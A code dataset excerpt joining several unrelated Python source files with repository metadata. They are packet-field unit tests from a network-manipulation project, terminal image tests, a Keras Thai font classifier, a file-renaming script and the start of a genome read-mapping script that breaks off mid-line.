layers.dns_layer.DNSLayer.dns_decompress(p, logger)\n assert p2 == p, \"dns_decompress changed a non DNS packet\"\n\n\ndef test_options_mss():\n \"\"\"\n Tests options-eol.\n \"\"\"\n pkt = TCP(options=[(\"MSS\", 1440)])\n p = layers.packet.Packet(pkt)\n assert p.get(\"TCP\", \"options-mss\") == 1440\n p2 = layers.packet.Packet(TCP(bytes(p)))\n assert p2.get(\"TCP\", \"options-mss\") == 1440\n p = layers.packet.Packet(TCP(options=[]))\n assert p.get(\"TCP\", \"options-mss\") == \"\"\n p.set(\"TCP\", \"options-mss\", 2880)\n p.show()\n assert len(p[\"TCP\"].options) == 1\n assert any(k == \"MSS\" for k, v in p[\"TCP\"].options)\n value = p.gen(\"TCP\", \"options-mss\")\n p.set(\"TCP\", \"options-mss\", value)\n p2 = TCP(bytes(p))\n assert any(k == \"MSS\" for k, v in p2[\"TCP\"].options)\n\n\ndef check_get(protocol, field, value):\n \"\"\"\n Checks if the get method worked for this protocol, field, and value.\n \"\"\"\n pkt = protocol()\n setattr(pkt, field, value)\n packet = layers.packet.Packet(pkt)\n assert packet.get(protocol.__name__, field) == value\n\n\ndef get_test_configs():\n \"\"\"\n Generates test configurations for the getters.\n \"\"\"\n return [\n (IP, 'version', 4),\n (IP, 'version', 6),\n (IP, 'version', 0),\n (IP, 'ihl', 0),\n (IP, 'tos', 0),\n (IP, 'len', 50),\n (IP, 'len', 6),\n (IP, 'flags', 'MF'),\n (IP, 'flags', 'DF'),\n (IP, 'flags', 'MF+DF'),\n (IP, 'ttl', 25),\n (IP, 'proto', 4),\n (IP, 'chksum', 0x4444),\n (IP, 'src', '127.0.0.1'),\n (IP, 'dst', '127.0.0.1'),\n (TCP, 'sport', 12345),\n (TCP, 'dport', 55555),\n (TCP, 'seq', 123123123),\n (TCP, 'ack', 181818181),\n (TCP, 'dataofs', 5),\n (TCP, 'dataofs', 0),\n (TCP, 'dataofs', 15),\n (TCP, 'reserved', 0),\n (TCP, 'window', 100),\n (TCP, 'chksum', 0x4444),\n (TCP, 'urgptr', 1),\n\n (DNS, 'id', 0xabcd),\n (DNS, 'qr', 1),\n (DNS, 'opcode', 9),\n (DNS, 'aa', 0),\n (DNS, 'tc', 1),\n (DNS, 'rd', 0),\n (DNS, 'ra', 1),\n (DNS, 'z', 0),\n (DNS, 'ad', 1),\n (DNS, 'cd', 0),\n (DNS, 'qdcount', 0x1234),\n (DNS, 'ancount', 12345),\n (DNS, 'nscount', 49870),\n (DNS, 'arcount', 0xABCD),\n\n (DNSQR, 'qname', 'example.com.'),\n (DNSQR, 'qtype', 1),\n (DNSQR, 'qclass', 0),\n ]\n\n\ndef get_custom_configs():\n \"\"\"\n Generates test configurations that can use the custom getters.\n \"\"\"\n return [\n (IP, 'flags', ''),\n (TCP, 'options-eol', ''),\n (TCP, 'options-nop', ''),\n (TCP, 'options-mss', 0),\n (TCP, 'options-mss', 1440),\n (TCP, 'options-mss', 5000),\n (TCP, 'options-wscale', 20),\n (TCP, 'options-sackok', ''),\n (TCP, 'options-sack', ''),\n (TCP, 'options-timestamp', 12345678),\n (TCP, 'options-altchksum', 0x44),\n (TCP, 'options-altchksumopt', ''),\n (TCP, 'options-uto', 1),\n #(TCP, 'options-md5header', 'deadc0ffee')\n ]\n\n\n@pytest.mark.parametrize(\"config\", get_test_configs(),\n ids=['%s-%s-%s' % (proto.__name__, field, str(val)) for proto, field, val in get_test_configs()])\ndef test_get(config):\n \"\"\"\n Tests value retrieval.\n \"\"\"\n proto, field, val = config\n check_get(proto, field, val)\n\n\ndef check_set_get(protocol, field, value):\n \"\"\"\n Checks if the get method worked for this protocol, field, and value.\n \"\"\"\n pkt = layers.packet.Packet(protocol())\n pkt.set(protocol.__name__, field, value)\n assert pkt.get(protocol.__name__, field) == value\n # Rebuild the packet to confirm the type survived\n pkt2 = layers.packet.Packet(protocol(bytes(pkt)))\n assert pkt2.get(protocol.__name__, field) == value, \"Value %s for header %s didn't survive packet parsing.\" % (value, field)\n\n\n@pytest.mark.parametrize(\"config\", get_test_configs() + get_custom_configs(),\n ids=['%s-%s-%s' % (proto.__name__, field, str(val)) for proto, field, val in get_test_configs() + get_custom_configs()])\ndef test_set_get(config):\n \"\"\"\n Tests value retrieval.\n \"\"\"\n proto, field, value = config\n check_set_get(proto, field, value)\n\n\ndef check_gen_set_get(protocol, field):\n \"\"\"\n Checks if the get method worked for this protocol, field, and value.\n \"\"\"\n pkt = layers.packet.Packet(protocol())\n new_value = pkt.gen(protocol.__name__, field)\n pkt.set(protocol.__name__, field, new_value)\n assert pkt.get(protocol.__name__, field) == new_value\n # Rebuild the packet to confirm the type survived\n pkt2 = layers.packet.Packet(protocol(bytes(pkt)))\n assert pkt2.get(protocol.__name__, field) == new_value\n\n\n@pytest.mark.parametrize(\"config\", get_test_configs() + get_custom_configs(),\n ids=['%s-%s' % (proto.__name__, field) for proto, field, _ in get_test_configs() + get_custom_configs()])\ndef test_gen_set_get(config):\n \"\"\"\n Tests value retrieval.\n \"\"\"\n # Test each generator 50 times to hit a range of values\n for i in range(0, 50):\n proto, field, _ = config\n check_gen_set_get(proto, field)\n\n\ndef test_custom_get():\n \"\"\"\n Tests value retrieval for custom getters.\n \"\"\"\n pkt = IP()/TCP()/Raw(load=\"AAAA\")\n tcp = layers.packet.Packet(pkt)\n assert tcp.get(\"TCP\", \"load\") == \"AAAA\"\n\n\ndef test_restrict_fields(logger):\n \"\"\"\n Tests packet field restriction.\n \"\"\"\n layers.packet.SUPPORTED_LAYERS = [\n layers.ip_layer.IPLayer,\n layers.tcp_layer.TCPLayer,\n layers.udp_layer.UDPLayer\n ]\n tcpfields = layers.tcp_layer.TCPLayer.fields\n udpfields = layers.udp_layer.UDPLayer.fields\n ipfields = layers.ip_layer.IPLayer.fields\n\n layers.packet.Packet.restrict_fields(logger, [\"TCP\", \"UDP\"], [], [])\n assert len(layers.packet.SUPPORTED_LAYERS) == 2\n assert layers.tcp_layer.TCPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.udp_layer.UDPLayer in layers.packet.SUPPORTED_LAYERS\n assert not layers.ip_layer.IPLayer in layers.packet.SUPPORTED_LAYERS\n\n pkt = IP()/TCP()\n packet = layers.packet.Packet(pkt)\n assert \"TCP\" in packet.layers\n assert not \"IP\" in packet.layers\n assert len(packet.layers) == 1\n\n for i in range(0, 2000):\n layer, proto, field = layers.packet.Packet().gen_random()\n assert layer in [TCP, UDP]\n\n # Check we can't retrieve any IP fields\n for field in layers.ip_layer.IPLayer.fields:\n with pytest.raises(AssertionError):\n packet.get(\"IP\", field)\n\n # Check we can get all the TCP fields\n for field in layers.tcp_layer.TCPLayer.fields:\n packet.get(\"TCP\", field)\n\n layers.packet.Packet.restrict_fields(logger, [\"TCP\", \"UDP\"], [\"flags\"], [])\n packet = layers.packet.Packet(pkt)\n assert len(layers.packet.SUPPORTED_LAYERS) == 1\n assert layers.tcp_layer.TCPLayer in layers.packet.SUPPORTED_LAYERS\n assert not layers.udp_layer.UDPLayer in layers.packet.SUPPORTED_LAYERS\n assert not layers.ip_layer.IPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.tcp_layer.TCPLayer.fields == [\"flags\"]\n assert not layers.udp_layer.UDPLayer.fields\n\n # Check we can't retrieve any IP fields\n for field in layers.ip_layer.IPLayer.fields:\n with pytest.raises(AssertionError):\n packet.get(\"IP\", field)\n\n # Check we can get all the TCP fields\n for field in tcpfields:\n if field == \"flags\":\n packet.get(\"TCP\", field)\n else:\n with pytest.raises(AssertionError):\n packet.get(\"TCP\", field)\n\n for i in range(0, 2000):\n layer, field, value = layers.packet.Packet().gen_random()\n assert layer == TCP\n assert field == \"flags\"\n\n _, proto, field, value, _ = actions.trigger.Trigger.get_rand_trigger(None, 0)\n assert proto == 'TCP'\n assert field == \"flags\"\n layers.packet.Packet.reset_restrictions()\n layers.packet.SUPPORTED_LAYERS = [\n layers.ip_layer.IPLayer,\n layers.tcp_layer.TCPLayer,\n layers.udp_layer.UDPLayer\n ]\n\n with pytest.raises(AssertionError):\n layers.packet.Packet.restrict_fields(logger, [\"TCP\", \"IP\"], [\"notathing\"], [\"notathing\"])\n layers.packet.Packet.reset_restrictions()\n\n layers.packet.Packet.restrict_fields(logger, [\"TCP\", \"IP\"], [], [\"sport\", \"dport\", \"seq\", \"src\"])\n packet = layers.packet.Packet(pkt)\n packet = packet.copy()\n assert packet.has_supported_layers()\n assert len(layers.packet.SUPPORTED_LAYERS) == 2\n assert layers.tcp_layer.TCPLayer in layers.packet.SUPPORTED_LAYERS\n assert not layers.udp_layer.UDPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.ip_layer.IPLayer in layers.packet.SUPPORTED_LAYERS\n assert set(layers.tcp_layer.TCPLayer.fields) == set([f for f in tcpfields if f not in [\"sport\", \"dport\", \"seq\"]])\n assert set(layers.ip_layer.IPLayer.fields) == set([f for f in ipfields if f not in [\"src\"]])\n\n # Check we can't retrieve any IP fields\n for field in layers.ip_layer.IPLayer.fields:\n if field == \"src\":\n with pytest.raises(AssertionError):\n packet.get(\"IP\", field)\n else:\n packet.get(\"IP\", field)\n\n # Check we can get all the TCP fields\n for field in tcpfields:\n if field in [\"sport\", \"dport\", \"seq\"]:\n with pytest.raises(AssertionError):\n packet.get(\"TCP\", field)\n else:\n packet.get(\"TCP\", field)\n\n for i in range(0, 2000):\n layer, field, value = layers.packet.Packet().gen_random()\n assert layer in [TCP, IP]\n assert field not in [\"sport\", \"dport\", \"seq\", \"src\"]\n\n _, proto, field, value, _ = actions.trigger.Trigger.get_rand_trigger(None, 0)\n assert proto in ['TCP', 'IP']\n assert field not in [\"sport\", \"dport\", \"seq\", \"src\"]\n\n layers.packet.Packet.reset_restrictions()\n layers.packet.SUPPORTED_LAYERS = [\n layers.ip_layer.IPLayer,\n layers.tcp_layer.TCPLayer,\n layers.udp_layer.UDPLayer\n ]\n\n evolve.restrict_headers(logger, \"ip,udp,dns\", \"\", \"version\")\n packet = layers.packet.Packet(pkt)\n proto, field, value = packet.get_random()\n assert proto.__name__ in [\"IP\", \"UDP\"]\n assert len(layers.packet.SUPPORTED_LAYERS) == 2\n assert not layers.tcp_layer.TCPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.udp_layer.UDPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.ip_layer.IPLayer in layers.packet.SUPPORTED_LAYERS\n assert set(layers.ip_layer.IPLayer.fields) == set([f for f in ipfields if f not in [\"version\"]])\n assert set(layers.udp_layer.UDPLayer.fields) == set(udpfields)\n\n layers.packet.Packet.reset_restrictions()\n for layer in layers.packet.SUPPORTED_LAYERS:\n assert layer.fields, '%s has no fields - reset failed!' % str(layer)\n","repo_name":"Kkevsterrr/geneva","sub_path":"tests/test_packet.py","file_name":"test_packet.py","file_ext":"py","file_size_in_byte":18984,"program_lang":"python","lang":"en","doc_type":"code","stars":1754,"dataset":"github-code","pt":"53"} +{"seq_id":"13409775019","text":"import pytest\nimport terminedia.image as IMG\nimport terminedia as TM\nfrom terminedia.values import DEFAULT_FG, Directions as D\n\n\n# Paletted shape is pending rewrite. Data reading from it should yield a characterless pixel\n@pytest.mark.skip\ndef test_palettedshape_new_works():\n\n a = IMG.PalettedShape.new((10, 10))\n a[5, 5] = \"A\"\n assert a.data[10 * 5 + 5] == \"A\"\n assert a.data.count(\" \") == 99\n\n\ndef test_valueshape_new_works():\n a = IMG.ValueShape.new((10, 10))\n a[5, 5] = (255, 255, 255)\n assert a.data[10 * 5 + 5] == (255, 255, 255)\n assert a.data.count((0, 0, 0)) == 99\n\n\ndef test_valueshape_new_works_grey():\n a = IMG.ValueShape.new((10, 10), color=128)\n a[5, 5] = 255\n assert a.data[10 * 5 + 5] == 255\n assert a.data.count(128) == 99\n\n\ndef test_imageshape_new_works():\n a = IMG.ImageShape.new((10, 10), color=(128, 128, 128))\n a[5, 5] = (255, 255, 255)\n assert a.data.getpixel((0, 0)) == (128, 128, 128)\n assert a.data.getpixel((5, 5)) == (255, 255, 255)\n\n\ndef test_shape_context_works():\n a = IMG.PalettedShape(\"...\\n....\")\n assert a.context.color == DEFAULT_FG\n\n\n@pytest.mark.parametrize(\n \"direction, quantity, exp_width, exp_height, exp_data\".split(\", \"),\n [\n (D.RIGHT, 1, 6, 3, [255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128]),\n (D.LEFT, 1, 6, 3, [0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0]),\n (D.DOWN, 1, 3, 6, [255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128]),\n (D.UP, 1, 3, 6, [0, 0, 0, 0, 0, 0, 0, 0, 128, 255, 0, 0, 0, 0, 0, 0, 0, 0]),\n (\n (1, 1),\n 1,\n 6,\n 6,\n [255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128],\n ),\n (\n (-1, -1),\n 1,\n 6,\n 6,\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n ),\n (\n D.RIGHT,\n 2,\n 9,\n 3,\n [255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 128],\n ),\n ],\n)\ndef test_valueshape_concat(\n direction, quantity, exp_width, exp_height, exp_data, DISPLAY, DELAY\n):\n a = IMG.ValueShape.new((3, 3), color=(0, 0, 0))\n b = IMG.ValueShape.new((3, 3), color=(0, 0, 0))\n\n a[0, 0] = (255, 0, 0)\n b[2, 2] = (128, 128, 255)\n c = a.concat(*((b,) * quantity), direction=direction)\n\n compare_data = [v[0] for v in c.data]\n\n if DISPLAY:\n with TM.Screen(clear_screen=True) as sc:\n sc.draw.blit((0, 0), c)\n sc.context.color = (128, 128, 255)\n sc.print_at(\n (0, 11), f\"quantity={quantity}, width={c.width}, heigth={c.height}\"\n )\n sc.print_at((0, 10), f\"[{compare_data!r}]\")\n TM.pause(DELAY)\n\n assert c.width == exp_width\n assert c.height == exp_height\n assert compare_data == exp_data\n\n\nclass Context:\n def __init__(self, **values):\n self.__dict__.update(values)\n\n\ndef test_create_pixel_bool():\n PXT1 = IMG.pixel_factory(\n value_type=bool,\n has_foreground=False,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n px1 = PXT1(True)\n assert px1.get_values(capabilities=PXT1.capabilities) == [True]\n\n\ndef test_create_pixel_from_pixel_bool_and_bool():\n PXT1 = IMG.pixel_factory(\n value_type=bool,\n has_foreground=False,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n px1 = PXT1(True)\n px2 = PXT1(px1)\n assert px1 == px2\n assert px2.get_values(capabilities=PXT1.capabilities) == [True]\n\n\n@pytest.mark.parametrize([\"inp\", \"expect\"], [[True, \"#\"], [False, \" \"]])\ndef test_create_pixel_from_pixel_bool_and_str(inp, expect):\n PXT1 = IMG.pixel_factory(\n value_type=bool,\n has_foreground=False,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n PXT2 = IMG.pixel_factory(\n value_type=str,\n has_foreground=False,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n px1 = PXT1(inp)\n px2 = PXT2(px1, context=Context(char=\"#\"))\n assert px2.get_values(capabilities=PXT2.capabilities) == [expect]\n\n\ndef test_create_pixel_from_pixel_str_bool_pick_color_discard_effect():\n PXT1 = IMG.pixel_factory(\n value_type=str,\n has_foreground=False,\n has_background=False,\n has_effects=True,\n translate_dots=False,\n )\n PXT2 = IMG.pixel_factory(\n value_type=bool,\n has_foreground=True,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n px1 = PXT1(\"#\", TM.Effects.underline)\n px2 = PXT2(px1, context=Context(color=(255, 0, 0)))\n assert px2.get_values(capabilities=PXT2.capabilities) == [True, (255, 0, 0)]\n\n\ndef test_shape_factory_yields_full_shape_on_size_parameter():\n sh = TM.shape((1,1))\n assert sh.__class__ is TM.image.FullShape\n\n\n@pytest.mark.parametrize(\"direct_pixel\", [True, False])\ndef test_fulshape_blit_called_with_pixel_value_on_blit(direct_pixel):\n import terminedia\n import unittest\n from functools import wraps\n orig = terminedia.image.FullShape.__setitem__\n @wraps(orig)\n def new(self, pos, value):\n assert isinstance(value, terminedia.image.Pixel if direct_pixel else (str, bool))\n new.called = True\n return orig(self, pos, value)\n new.called = False\n sh = TM.shape((1,1))\n sh2 = TM.shape((1,1))\n sh2.draw.set((0,0))\n with unittest.mock.patch(\"terminedia.image.FullShape.__setitem__\", new):\n terminedia.image.FullShape.__setitem__ = new\n target = sh.draw if direct_pixel else sh.high.draw\n target.blit((0,0), sh2)\n assert new.called\n\n\n","repo_name":"jsbueno/terminedia","sub_path":"tests/test_images.py","file_name":"test_images.py","file_ext":"py","file_size_in_byte":5941,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"163461823","text":"from keras.models import load_model\nimport cv2\nimport numpy as np\nimport os\n\n\nclass ImagePrediction():\n def __init__(self):\n self.alphabet_model = load_model(os.path.dirname(os.path.abspath('__file__'))+r'\\\\model\\\\alphabet_model.h5')\n\n def predict(self,image):\n self.image = image\n self.rois, self.roi_position,self.rois_img= self.get_regions_of_interest(self.image)\n self.predict_imgs = self.preprocessing(self.rois)\n self.predicted_alphabets,self.alphabets_confidence,self.alphabets_img = self.predict_alphabet(self.rois_img,self.roi_position,self.predict_imgs,self.alphabet_model)\n self.predicted_fonts,self.fonts_confidence = self.predict_font(self.predict_imgs,self.predicted_alphabets)\n self.font_result,self.result_confidence = self.get_font_result(self.predicted_fonts)\n \n @staticmethod\n def get_font_result(predicted_fonts):\n counter = 0\n result = predicted_fonts[0]\n for i in predicted_fonts:\n curr_frequency = predicted_fonts.count(i)\n if(curr_frequency> counter):\n counter = curr_frequency\n result = i\n result_confidence = predicted_fonts.count(result)/len(predicted_fonts)\n \n return result,result_confidence\n\n @staticmethod\n def croped2square(roi,increase_ratio=1.2):\n h, w = roi.shape\n r=int(max(h,w)*increase_ratio)\n square = np.zeros((r,r), dtype=np.uint8)\n # background.fill(255) # or img[:] = 255\n # place the image in the center of the background\n offset_x = int((square.shape[1] - w) / 2)\n offset_y = int((square.shape[0] - h) / 2)\n square[offset_y:offset_y+h, offset_x:offset_x+w] = roi\n square = cv2.resize(square, (100,100))\n return square\n\n @staticmethod\n def cropfit(img):\n # find the bounding box of the image\n # img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n #find the first row, first col, last row, last col of white pixels\n x, y, w, h = cv2.boundingRect(img)\n #crop the image\n img = img[y:y+h, x:x+w]\n return img\n\n def preprocessing(self,rois):\n predict_imgs=[]\n for roi in rois:\n img=self.croped2square(self.cropfit(roi))\n img=img.reshape(1,100,100,1)\n predict_imgs.append(img)\n return predict_imgs \n\n @staticmethod\n def get_regions_of_interest(img):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n thresh = cv2.threshold(gray, 50, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n contours = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]\n im2 = img.copy()\n rois=[]\n rois_position = []\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n cv2.rectangle(im2, (x, y), (x + w, y + h), (0, 255, 0), 2)\n roi = thresh[y:y + h, x:x + w]\n contours = cv2.findContours(roi, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]\n max_area = 0\n max_index = 0\n for index,cnt in enumerate(contours):\n area = cv2.contourArea(cnt)\n if area > max_area:\n max_area = area\n max_index = index\n for index,cnt in enumerate(contours):\n if index != max_index:\n x, y, w, h = cv2.boundingRect(cnt)\n roi[y:y + h, x:x + w] = 0\n rois.append(roi)\n rois_position.append((x,y,w,h))\n\n return rois, rois_position ,im2\n \n \n @staticmethod\n def predict_alphabet(image,rois_position,predict_imgs, model):\n predicted_classes=[]\n predictions=[]\n num2alpha = ['uni0E01', 'uni0E02', 'uni0E03', 'uni0E04', \n 'uni0E05', 'uni0E06', 'uni0E07', 'uni0E08', \n 'uni0E09', 'uni0E0A', 'uni0E0B', 'uni0E0C', \n 'uni0E0D', 'uni0E0E', 'uni0E0F', 'uni0E10', \n 'uni0E11', 'uni0E12', 'uni0E13', 'uni0E14', \n 'uni0E15', 'uni0E16', 'uni0E17', 'uni0E18', \n 'uni0E19', 'uni0E1A', 'uni0E1B', 'uni0E1C', \n 'uni0E1D', 'uni0E1E', 'uni0E1F', 'uni0E20', \n 'uni0E21', 'uni0E22', 'uni0E23', 'uni0E24', \n 'uni0E25', 'uni0E26', 'uni0E27', 'uni0E28', \n 'uni0E29', 'uni0E2A', 'uni0E2B', 'uni0E2C', \n 'uni0E2D', 'uni0E2E', 'uni0E2F', 'uni0E30', \n 'uni0E31', 'uni0E32', 'uni0E33', 'uni0E34', \n 'uni0E35', 'uni0E36', 'uni0E37', 'uni0E38', \n 'uni0E39', 'uni0E3A', 'uni0E3F', 'uni0E40', \n 'uni0E41', 'uni0E42', 'uni0E43', 'uni0E44', \n 'uni0E45', 'uni0E46', 'uni0E47', 'uni0E48', \n 'uni0E49', 'uni0E4A', 'uni0E4B', 'uni0E4C', \n 'uni0E4D', 'uni0E4E']\n for c,predict_img in enumerate(predict_imgs):\n # predict\n prediction=model.predict(predict_img)\n # img= cv2.putText(image, num2alpha[c], (rois_position[c][0], rois_position[c][1]),cv2.FONT_HERSHEY_SIMPLEX, 1, color=(0, 0, 255))\n predicted_classes.append(num2alpha[np.argmax(prediction, axis=-1)[0]])\n predictions.append(np.amax(prediction))\n return predicted_classes, predictions ,image\n @staticmethod\n def predict_font(predict_imgs, predicted_alphabets):\n num2font=['AngsanaNew', 'Chonburi', 'iannnnn-DUCK', 'MN KHAIPHALO',\n 'pluempluem', 'pphometowntest', 'THBaijam', 'THCharmofAU',\n 'THFahkwang', 'THKodchasal', 'THKoHo', 'THKrub', 'THMaliGrade6',\n 'THSarabunNew']\n predicted_fonts=[]\n predictions=[]\n for c,predict_img in enumerate(predict_imgs):\n model= load_model(os.path.dirname(os.path.abspath('__file__'))+r'\\\\model\\\\{}.h5'.format(predicted_alphabets[c]))\n prediction=model.predict(predict_img)\n predicted_fonts.append(num2font[np.argmax(prediction, axis=-1)[0]])\n predictions.append(np.amax(prediction))\n return predicted_fonts, predictions\n \n \n\n","repo_name":"kaowjubss/ThaiFontDetection","sub_path":"ImagePrediction.py","file_name":"ImagePrediction.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11523119310","text":"import handler\nimport unittest\nimport datetime\n\n\nclass TestHandler(unittest.TestCase):\n def test_arweave_data(self):\n date = datetime.datetime.today() - datetime.timedelta(days=1)\n result = handler.arweave_data('/tx?network=mainnet', date)\n print(result)\n self.assertTrue(result.isdigit())\n\n def test_cgc_global_data(self):\n result = handler.cgc_global_data('total_volume')\n print(result)\n self.assertTrue(result.isdigit())\n\n def test_fetch_data(self):\n data = handler.fetch_data(handler.get_yesterday())\n print(data.to_markdown())\n self.assertIsNotNone(data)\n\n def test_run(self):\n handler.run()\n self.assertTrue(True)\n","repo_name":"yikedu7/daily-mail","sub_path":"handler_test.py","file_name":"handler_test.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9512425052","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/8/14 9:15\n# @Author : runze.wang\n\nimport os\nimport shutil\n\nsource_path = '/home/gdp/data/spine_simulation_2D/masks'\ntarget_path = '/home/gdp/data/spine_simulation_2D/masks_2'\n\nimg_names = os.listdir(os.path.join(source_path))\n\n\nfor img_name in img_names:\n if 'seg' in img_name:\n shutil.copy(os.path.join(source_path, img_name),\n os.path.join(target_path,\n img_name.split('_seg_implant')[0]+\n img_name.split('_seg_implant')[-1].split('.png')[0]+'_implant.png'))\n else:\n shutil.copy(os.path.join(source_path, img_name),\n os.path.join(target_path,\n img_name.split('_implant')[0]+\n img_name.split('_implant')[-1].split('.png')[0]+'_implant.png'))\n # try:\n # shutil.copy(os.path.join(source_path, img_name),\n # os.path.join(target_path,img_name.split('.png')[0]+'_2.png'))\n # except:\n # print('The following file ==>{}<== rename file fail\\r\\n'.\n # format(os.path.join(source_path, img_name)))\n\n\n","repo_name":"runze-wang-sjtu/tools","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74306892649","text":"import sys\nimport numpy as np\nimport math\nimport editdistance\nimport matplotlib.pyplot as plt\n\nverbose = 0\n\n# simple function to load a fasta file\ndef load_fasta(filename):\n genome = ''\n description = ''\n with open(filename) as f:\n lines = f.readlines()\n for line in lines:\n line = line.rstrip()\n if line[0] == '>':\n description = line[1:]\n else:\n genome += line\n\n return genome, description\n\ndef load_fastq(filename):\n reads = []\n with open(filename) as f:\n done = False\n while not done:\n line = f.readline()\n if line == '':\n done = True\n elif line[0] == '@':\n reads.append(f.readline().rstrip())\n return reads\n\ndef load_readlist(filename):\n reads = []\n with open(filename) as f:\n lines = f.readlines()\n for line in lines:\n reads.append(line.rstrip())\n return reads\n\ndef reverse_comp(read):\n rcomp = {'A':'T', 'C':'G', 'G':'C', 'T':'A'}\n rread = ''\n for c in read[::-1]:\n rread += rcomp[c]\n return rread\n\ndef bases2vals(bases):\n valdict = {'A':'0', 'C':'1', 'G':'2', 'T':'3'}\n vals = ''\n for base in bases:\n vals += valdict[base]\n return vals\n\n# generates an array of size 4^hash_len and each entry contains a list of genome positions matching the hash\ndef generate_hashlist(genome, hash_len):\n hash_list = []\n genome_len = len(genome)\n num_hashs = int(math.pow(4,hash_len))\n\n for i in range(num_hashs):\n hash_list.append([])\n\n genome_position = 0\n while genome_position < (genome_len-hash_len):\n if pos_list and genome_position not in pos_list:\n genome_position += 1\n continue\n index = int(bases2vals(genome[genome_position:genome_position+hash_len]), 4)\n hash_list[index].append(genome_position)\n genome_position += 1\n\n return hash_list\n\ndef map_read(genome, read, hash_list, hash_len):\n # for each genome position in the hash list, compute edit distance for read, return the position & edit distance of the best match\n bestdist = -1\n bestpos = -1\n readlen = len(read)\n hash_index = int(bases2vals(read[:hash_len]), 4) # cool python way to convert a base-4 string to a base-10 integer\n for pos in hash_list[hash_index]:\n dist = editdistance.eval(genome[pos:pos+readlen], read)\n if bestdist == -1 or dist < bestdist:\n bestdist = dist\n bestpos = pos\n\n return bestpos,bestdist\n\ndef qualscore(readlen, num_errors):\n qual_score = -10.0 * math.log10(num_errors/readlen)\n return qual_score\n\ndef scoremin(seq, ref, minlen):\n bestq = 0\n best_q_len = 0\n perfect_len = 0\n\n errors = 0\n ls = len(seq)\n lr = len(ref)\n if lr < ls:\n ls = lr\n\n q = 0\n\n for i in range(minlen):\n if seq[i] != ref[i]:\n errors += 1\n if perfect_len == 0 and errors == 1:\n perfect_len = i\n if errors > 0:\n q = qualscore(minlen, errors)\n bestq = q\n best_q_len = minlen\n else:\n perfect_len = minlen\n\n for i in range(minlen,ls):\n if seq[i] != ref[i]:\n errors += 1\n if errors > 0:\n q = qualscore(i+1, errors)\n else:\n q = 0\n if perfect_len == 0 and errors == 1:\n perfect_len = i\n if q > bestq:\n bestq = q\n best_q_len = i+1\n\n return (bestq,best_q_len,perfect_len)\n\n# set some defaults\nref_name = 'phix174.fasta'\nin_filename = 'phix174.reads'\nout_filename = 'phix174.reads.out'\nhash_len = 4\nscore_cutoff = 0.0\nscore_cutofflen = 0\ndirection_filter = 0\npos_list = None\nwant_plots = False\n\n# parse cmd-line args\nargcc = 1\nargc = len(sys.argv)\nwhile argcc < argc:\n if sys.argv[argcc] == '--ref':\n argcc += 1\n ref_name = sys.argv[argcc]\n if sys.argv[argcc] == '--in':\n argcc += 1\n in_filename = sys.argv[argcc]\n if sys.argv[argcc] == '--out':\n argcc += 1\n out_filename = sys.argv[argcc]\n if sys.argv[argcc] == '--hl':\n argcc += 1\n hash_len = int(sys.argv[argcc])\n if sys.argv[argcc] == '--filter':\n argcc += 1\n score_cutoff = float(sys.argv[argcc])\n argcc += 1\n score_cutofflen = int(sys.argv[argcc])\n if sys.argv[argcc] == '--direction':\n argcc += 1\n direction_filter = int(sys.argv[argcc])\n if sys.argv[argcc] == '--poslist':\n argcc += 1\n pos_list = [int(i) for i in sys.argv[argcc].split(',')]\n if sys.argv[argcc] == '--plots':\n want_plots = True\n if sys.argv[argcc] == '-v':\n verbose += 1\n argcc += 1\n\n# load up our reads\nif in_filename is None:\n print('missing --in readfile?')\n exit(0)\nif '.fastq' in in_filename:\n reads = load_fastq(in_filename)\nelse:\n reads = load_readlist(in_filename)\nprint('loaded %d reads' % len(reads))\n\n# load up the fasta file\nref,description = load_fasta(ref_name)\nif verbose > 0:\n print('loaded ref: %s\\nlength: %d\\n' % (description, len(ref)))\n\nif verbose > 1:\n print('first few reads:')\n for r in range(20):\n print('%s' % reads[r])\n\n# generate hash list from genome and map reads\nprint('generating hash list...')\nhash_list = 